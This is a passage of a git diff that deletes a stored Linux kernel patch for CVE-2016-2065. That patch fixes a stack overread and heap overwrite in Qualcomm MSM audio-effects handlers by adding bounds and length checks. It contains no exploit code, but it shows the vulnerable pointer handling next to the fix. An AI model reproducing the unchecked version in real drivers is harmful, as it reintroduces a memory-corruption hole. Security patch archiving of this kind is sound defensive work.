- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
--		int idx, j;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t idx;
-+		int j;
- 		switch (command_id) {
- 		case EQ_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -781,17 +1045,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = eq->enable_flag;
--			eq->enable_flag = *values++;
-+			eq->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: EQ_ENABLE prev:%d new:%d\n", __func__,
- 				prev_enable_flag, eq->enable_flag);
- 			if (prev_enable_flag != eq->enable_flag) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_ENABLE", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
--				*updt_params++ = AUDPROC_PARAM_ID_EQ_ENABLE;
--				*updt_params++ = EQ_ENABLE_PARAM_SZ;
--				*updt_params++ = eq->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_EQ_ENABLE;
-+				*updt_params++ =
- 					EQ_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					eq->enable_flag;
- 			}
- 			break;
- 		case EQ_CONFIG:
-@@ -805,9 +1078,12 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				eq->config.eq_pregain, eq->config.preset_id);
- 			for (idx = 0; idx < MAX_EQ_BANDS; idx++)
- 				eq->per_band_cfg[idx].band_idx = -1;
--			eq->config.eq_pregain = *values++;
--			eq->config.preset_id = *values++;
--			eq->config.num_bands = *values++;
-+			eq->config.eq_pregain =
-+				GET_NEXT(values, param_max_offset, rc);
-+			eq->config.preset_id =
-+				GET_NEXT(values, param_max_offset, rc);
-+			eq->config.num_bands =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (eq->config.num_bands > MAX_EQ_BANDS) {
- 				pr_err("EQ_CONFIG:invalid num of bands\n");
- 				rc = -EINVAL;
-@@ -822,48 +1098,59 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			for (j = 0; j < eq->config.num_bands; j++) {
--				idx = *values++;
-+				idx = GET_NEXT(values, param_max_offset, rc);
- 				if (idx >= MAX_EQ_BANDS) {
- 					pr_err("EQ_CONFIG:invalid band index\n");
- 					rc = -EINVAL;
- 					goto invalid_config;
- 				}
- 				eq->per_band_cfg[idx].band_idx = idx;
--				eq->per_band_cfg[idx].filter_type = *values++;
-+				eq->per_band_cfg[idx].filter_type =
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].freq_millihertz =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].gain_millibels =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].quality_factor =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 			}
- 			if (command_config_state == CONFIG_SET) {
- 				int config_param_length = EQ_CONFIG_PARAM_SZ +
- 					(EQ_CONFIG_PER_BAND_PARAM_SZ*
- 					 eq->config.num_bands);
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						config_param_length;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_CONFIG", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
--				*updt_params++ = AUDPROC_PARAM_ID_EQ_CONFIG;
--				*updt_params++ = config_param_length;
--				*updt_params++ = eq->config.eq_pregain;
--				*updt_params++ = eq->config.preset_id;
--				*updt_params++ = eq->config.num_bands;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_EQ_CONFIG;
-+				*updt_params++ =
-+					config_param_length;
-+				*updt_params++ =
-+					eq->config.eq_pregain;
-+				*updt_params++ =
-+					eq->config.preset_id;
-+				*updt_params++ =
-+					eq->config.num_bands;
- 				for (idx = 0; idx < MAX_EQ_BANDS; idx++) {
- 					if (eq->per_band_cfg[idx].band_idx < 0)
- 						continue;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].filter_type;
-+					eq->per_band_cfg[idx].filter_type;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].freq_millihertz;
-+					eq->per_band_cfg[idx].freq_millihertz;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].gain_millibels;
-+					eq->per_band_cfg[idx].gain_millibels;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].quality_factor;
-+					eq->per_band_cfg[idx].quality_factor;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].band_idx;
-+					eq->per_band_cfg[idx].band_idx;
- 				}
--				params_length += COMMAND_PAYLOAD_SZ +
--						config_param_length;
- 			}
- 			break;
- 		case EQ_BAND_INDEX:
-@@ -872,7 +1159,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			idx = *values++;
-+			idx = GET_NEXT(values, param_max_offset, rc);
- 			if (idx > MAX_EQ_BANDS) {
- 				pr_err("EQ_BAND_INDEX:invalid band index\n");
- 				rc = -EINVAL;
-@@ -882,14 +1169,21 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 			pr_debug("%s: EQ_BAND_INDEX val:%d\n",
- 				__func__, eq->band_index);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_BAND_INDEX_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_BAND_INDEX", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_EQ_BAND_INDEX;
--				*updt_params++ = EQ_BAND_INDEX_PARAM_SZ;
--				*updt_params++ = eq->band_index;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					EQ_BAND_INDEX_PARAM_SZ;
-+				*updt_params++ =
-+					eq->band_index;
- 			}
- 			break;
- 		case EQ_SINGLE_BAND_FREQ:
-@@ -902,18 +1196,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				pr_err("EQ_SINGLE_BAND_FREQ:invalid index\n");
- 				break;
- 			}
--			eq->freq_millihertz = *values++;
-+			eq->freq_millihertz =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: EQ_SINGLE_BAND_FREQ idx:%d, val:%d\n",
- 				__func__, eq->band_index, eq->freq_millihertz);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_SINGLE_BAND_FREQ_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_SINGLE_BAND_FREQ", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_EQ_SINGLE_BAND_FREQ;
--				*updt_params++ = EQ_SINGLE_BAND_FREQ_PARAM_SZ;
--				*updt_params++ = eq->freq_millihertz;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					EQ_SINGLE_BAND_FREQ_PARAM_SZ;
-+				*updt_params++ =
-+					eq->freq_millihertz;
- 			}
- 			break;
- 		default:
-@@ -921,7 +1223,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -938,9 +1240,10 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- {
- 	int devices;
- 	int num_commands;
--	char *params;
-+	char *params = NULL;
- 	int *updt_params, i;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-+	long *param_max_offset;
- 	int rc = 0;
- 
- 	pr_debug("%s: instance: %d\n", __func__, instance);
-@@ -949,9 +1252,11 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 			__func__);
- 		return -EINVAL;
- 	}
--	if (!ac) {
--		pr_err("%s: cannot set audio effects as audio client is NULL\n",
--			__func__);
-+	param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	devices = GET_NEXT(values, param_max_offset, rc);
-+	num_commands = GET_NEXT(values, param_max_offset, rc);
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
-+		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
- 	params = kzalloc(params_length, GFP_KERNEL);
-@@ -959,88 +1264,114 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 		pr_err("%s, params memory alloc failed\n", __func__);
- 		return -ENOMEM;
- 	}
--	devices = *values++;
--	num_commands = *values++;
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case SOFT_VOLUME_GAIN_2CH:
- 		case SOFT_VOLUME2_GAIN_2CH:
- 			if (length != 2 || index_offset != 0) {
--				pr_err("VOLUME_GAIN_2CH/VOLUME2_GAIN_2CH:invalid params\n");
-+				pr_err("VOLUME_GAIN_2CH: invalid params\n");
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			vol->left_gain = *values++;
--			vol->right_gain = *values++;
-+			vol->left_gain = GET_NEXT(values, param_max_offset, rc);
-+			vol->right_gain =
-+				GET_NEXT(values, param_max_offset, rc);
- 			vol->master_gain = 0x2000;
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VOLUME/VOLUME2_GAIN_2CH",
-+						rc);
-+				if (rc != 0)
-+					break;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN;
--				*updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
--				*updt_params++ = (vol->left_gain << 16) |
--						 vol->right_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					(vol->left_gain << 16) |
-+						vol->right_gain;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN;
- 				*updt_params++ =
- 					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
--				*updt_params++ = vol->master_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				*updt_params++ =
-+					vol->master_gain;
- 			}
- 			break;
- 		case SOFT_VOLUME_GAIN_MASTER:
- 		case SOFT_VOLUME2_GAIN_MASTER:
- 			if (length != 1 || index_offset != 0) {
--				pr_err("VOLUME_GAIN_MASTER/VOLUME2_GAIN_MASTER:invalid params\n");
-+				pr_err("VOLUME_GAIN_MASTER: invalid params\n");
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
- 			vol->left_gain = 0x2000;
- 			vol->right_gain = 0x2000;
--			vol->master_gain = *values++;
-+			vol->master_gain =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VOLUME/VOLUME2_GAIN_MASTER",
-+						rc);
-+				if (rc != 0)
-+					break;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN;
--				*updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
--				*updt_params++ = (vol->left_gain << 16) |
--						 vol->right_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					(vol->left_gain << 16) |
-+						vol->right_gain;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN;
- 				*updt_params++ =
- 					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
--				*updt_params++ = vol->master_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				*updt_params++ =
-+					vol->master_gain;
- 			}
- 			break;
- 		default:
-@@ -1049,7 +1380,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length)
-+	if (params_length && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- invalid_config:
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index f814434..b4bd43d 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -2839,7 +2839,7 @@ static int msm_compr_audio_effects_config_info(struct snd_kcontrol *kcontrol,
- 					       struct snd_ctl_elem_info *uinfo)
- {
- 	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
--	uinfo->count = 128;
-+	uinfo->count = MAX_PP_PARAMS_SZ;
- 	uinfo->value.integer.min = 0;
- 	uinfo->value.integer.max = 0xFFFFFFFF;
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2065/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2065/ANY/0001.patch
deleted file mode 100644
index 06b77eb4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2065/ANY/0001.patch
+++ /dev/null
@@ -1,1511 +0,0 @@
-From 775fca8289eff931f91ff6e8c36cf2034ba59e88 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang <wjiang@codeaurora.org>
-Date: Wed, 16 Mar 2016 12:51:03 +0800
-Subject: ASoC: msm: audio-effects: fix stack overread and heap overwrite
-
-Fix overwrite of updt_params allocated in heap, and stack overread
-where param pointer is passed from user space.
-
-CRs-Fixed: 989628
-Change-Id: Ida8bdb7da2fcb97023dce3b6eafe4b899a51cb66
-Signed-off-by: Weiyin Jiang <wjiang@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c |   3 +-
- include/sound/msm-audio-effects-q6-v2.h         |   4 +-
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 835 +++++++++++++++++-------
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c      |   2 +-
- 4 files changed, 588 insertions(+), 256 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..3ba20ca 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -20,7 +20,6 @@
- #include <sound/msm-dts-eagle.h>
- 
- #define MAX_CHANNELS_SUPPORTED		8
--#define MAX_PP_PARAMS_SZ		128
- #define WAIT_TIMEDOUT_DURATION_SECS	1
- 
- struct q6audio_effects {
-diff --git a/include/sound/msm-audio-effects-q6-v2.h b/include/sound/msm-audio-effects-q6-v2.h
-index cbdea32..6bc2338 100644
---- a/include/sound/msm-audio-effects-q6-v2.h
-+++ b/include/sound/msm-audio-effects-q6-v2.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -16,6 +16,8 @@
- 
- #include <sound/audio_effects.h>
- 
-+#define MAX_PP_PARAMS_SZ   128
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- 						int topology);
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index e26c453..1c08842 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,24 @@
- 
- #define MAX_ENABLE_CMD_SIZE 32
- 
-+#define GET_NEXT(ptr, upper_limit, rc)                                  \
-+({                                                                      \
-+	if (((ptr) + 1) > (upper_limit)) {                              \
-+		pr_err("%s: param list out of boundary\n", __func__);   \
-+		(rc) = -EINVAL;                                         \
-+	}                                                               \
-+	((rc) == 0) ? *(ptr)++ :  -EINVAL;                              \
-+})
-+
-+#define CHECK_PARAM_LEN(len, max_len, tag, rc)                          \
-+do {                                                                    \
-+	if ((len) > (max_len)) {                                        \
-+		pr_err("%s: params length overflows\n", (tag));         \
-+		(rc) = -EINVAL;                                         \
-+	}                                                               \
-+} while (0)
-+
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- 						int topology)
- {
-@@ -109,15 +127,16 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				struct virtualizer_params *virtualizer,
- 				long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -130,10 +149,14 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case VIRTUALIZER_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -142,17 +165,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = virtualizer->enable_flag;
--			virtualizer->enable_flag = *values++;
-+			virtualizer->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:VIRT ENABLE prev:%d, new:%d\n", __func__,
- 				prev_enable_flag, virtualizer->enable_flag);
- 			if (prev_enable_flag != virtualizer->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
--				*updt_params++ =
--					AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
--				*updt_params++ = VIRTUALIZER_ENABLE_PARAM_SZ;
--				*updt_params++ = virtualizer->enable_flag;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					VIRTUALIZER_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_VIRTUALIZER;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-+				*updt_params++ =
-+				VIRTUALIZER_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+				virtualizer->enable_flag;
- 			}
- 			break;
- 		case VIRTUALIZER_STRENGTH:
-@@ -161,17 +193,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->strength = *values++;
-+			virtualizer->strength =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT STRENGTH val: %d\n",
- 					__func__, virtualizer->strength);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					VIRTUALIZER_STRENGTH_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT STRENGTH", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_VIRTUALIZER_STRENGTH;
--				*updt_params++ = VIRTUALIZER_STRENGTH_PARAM_SZ;
--				*updt_params++ = virtualizer->strength;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					VIRTUALIZER_STRENGTH_PARAM_SZ;
-+				*updt_params++ =
-+					virtualizer->strength;
- 			}
- 			break;
- 		case VIRTUALIZER_OUT_TYPE:
-@@ -180,17 +221,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->out_type = *values++;
-+			virtualizer->out_type =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT OUT_TYPE val:%d\n",
- 				__func__, virtualizer->out_type);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT OUT_TYPE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_VIRTUALIZER_OUT_TYPE;
--				*updt_params++ = VIRTUALIZER_OUT_TYPE_PARAM_SZ;
--				*updt_params++ = virtualizer->out_type;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+				*updt_params++ =
-+					virtualizer->out_type;
- 			}
- 			break;
- 		case VIRTUALIZER_GAIN_ADJUST:
-@@ -199,18 +249,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->gain_adjust = *values++;
-+			virtualizer->gain_adjust =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT GAIN_ADJUST val:%d\n",
- 				__func__, virtualizer->gain_adjust);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
--				*updt_params++ =
--				       AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
--				*updt_params++ =
--					VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
--				*updt_params++ = virtualizer->gain_adjust;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT GAIN_ADJUST", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_VIRTUALIZER;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
-+				*updt_params++ =
-+				VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+				*updt_params++ =
-+				virtualizer->gain_adjust;
- 			}
- 			break;
- 		default:
-@@ -218,7 +276,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -232,15 +290,16 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				     struct reverb_params *reverb,
- 				     long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -253,10 +312,14 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case REVERB_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -265,16 +328,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = reverb->enable_flag;
--			reverb->enable_flag = *values++;
-+			reverb->enable_flag =
